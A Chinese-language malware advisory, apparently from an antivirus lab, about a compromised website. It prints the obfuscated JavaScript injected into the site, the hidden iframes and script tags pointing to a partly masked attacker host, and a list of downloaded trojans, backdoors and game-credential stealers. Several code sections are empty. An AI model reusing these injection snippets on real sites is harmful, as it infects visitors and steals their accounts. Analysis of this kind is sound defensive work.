八文网网站挂马事件

  11月15日，安天实验室反病毒监测网发现，八文网网站(http://www.8***.com/search/docs/%CF%D6%B4%FA%CA%AB/1)被黑客植入病毒，用户如果访问该网站，会被病毒感染。系统就会自动从恶意网站上下载并运行多个恶意程序。有可能被远程控制，盗取用户敏感信息等。

　　该网站的主页里的http://www.8***.com/js/search_bot.js被插入如下挂马代码：

 

        var strBegin = " 
　　document.writeln( strBegin + "tp:////60." + "190.10"
　　+ "1." + "2" + "06//m1.h" + "tm?9792/" width=/"20/"
　　height=/"0/" fr" + "amebo");
　　document.writeln(strEnd);

　　使用了字符变量，仔细分析得到连接地址：http://60.190.101.***/m1.htm?9792

　　访问该地址得到代码：　

挂马地址：

      <HTML>
　　<script src=http://60.190.101.***/aa/aa.js></script>
　　
　　</HTML>
　　<iframe src="http://60.190.101.***/aa/aa1.htm" width="20" height="0"
　　frameborder="0"></iframe>
　　
　　<iframe src="http://60.190.101.***/aa/aa2.htm" width="20" height="0"
　　frameborder="0"></iframe>
　　
　　<iframe src="http://60.190.101.***/aa/aa3.htm" width="20" height="0"
　　frameborder="0"></iframe>
　　
　　<iframe src="http://60.190.101.***/aa/aa4.htm" width="20" height="0"
　　frameborder="0"></iframe>
　　
　　<iframe src="http://60.190.101.***/aa/aa5.htm" width="20" height="0"
　　frameborder="0"></iframe>

　　<iframe src="http://60.190.101.***/aa/aa6.htm" width="20" height="0"
　　frameborder="0"></iframe>
　　
　　<iframe src="http://60.190.101.***/aa/aa.htm" width="20" height="0"
　　frameborder="0"></iframe>

 　http://60.190.101.***/aa/aa.js为加密网马：

　　

　　http://60.190.101.***/aa/aa1.htm被插入：         http://60.190.101.***/aa/ccc1.js

　　http://60.190.101.***/aa/ccc1.js得到挂马代码：

　　

　　http://60.190.101.***/aa/aa2.htm代码：

　　

　　http://60.190.101.***/aa/aa3.htm被插入：

<script language=javascript src=http://60.190.101.***/aa/xl.js></script>

　http://60.190.101.***/aa/bb.js的代码：

　　

　　http://60.190.101.***/aa/aa6.htm得到代码：

　　
http://60.190.101.***/aa/aa.htm代码： 　　

当用户访问http://www.8***.com/search/docs/%CF%D6%B4%FA%CA%AB/1时，

　　系统会自动隐藏下载以下病毒文件：

      http://60.190.101.***/abc.exe
　　病毒名：(Worm.Win32.Downloader.f) 蠕虫下载者木马
　　http://60.190.101.***/aa1.exe
　　病毒名：(Trojan-Downloader.Win32.Delf.aas) 下载者木马
　　一旦运行该木马将下载以下病毒到用户的系统，并运行。
　　http://60.190.101.***/aa2.exe
　　病毒名：(Backdoor.Win32.Agent.afh) 后门木马
　　http://60.190.101.***/aa3.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.hpj) 盗号木马
　　http://60.190.101.***/aa4.exe
　　病毒名：(rojan-PSW.Win32.OnLineGames.hqn) 盗号木马
　　http://60.190.101.***/aa5.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.fyn) 游戏盗号木马
　　http://60.190.101.***/aa6.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.gny) 游戏盗号木马
　　http://60.190.101.***/aa7.exe
　　病毒名：(Trojan-Downloader.Win32.Agent.blm) 下载者木马
　　http://60.190.101.***/aa8.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.gti) 盗号木马
　　http://60.190.101.***/aa9.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.hqy) 游戏木马
　　http://60.190.101.***/aa10.exe
　　病毒名：(Trojan-PSW.Win32.Lmir.bos) 游戏木马
　　http://60.190.101.***/aa11.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.gxb) 游戏盗号木马
　　http://60.190.101.***/aa12.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.hcp) 游戏盗号木马
　　http://60.190.101.***/aa13.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.hnt) 游戏盗号木马
　　http://60.190.101.***/aa14.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.hqc) 游戏盗号木马
　　http://60.190.101.***/aa15.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.hfd) 游戏木马
　　http://60.190.101.***/aa16.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.hfr) 游戏盗号木马
　　http://60.190.101.***/aa17.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.hqx) 游戏木马
　　http://60.190.101.***/aa18.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.hqh) 游戏木马
　　http://60.190.101.***/aa19.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.hre) 游戏木马
　　http://60.190.101.***/aa20.exe
　　病毒名：(Backdoor.Win32.Delf.awy) 后门木马
　　http://60.190.101.***/aa21.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.ghq) 游戏木马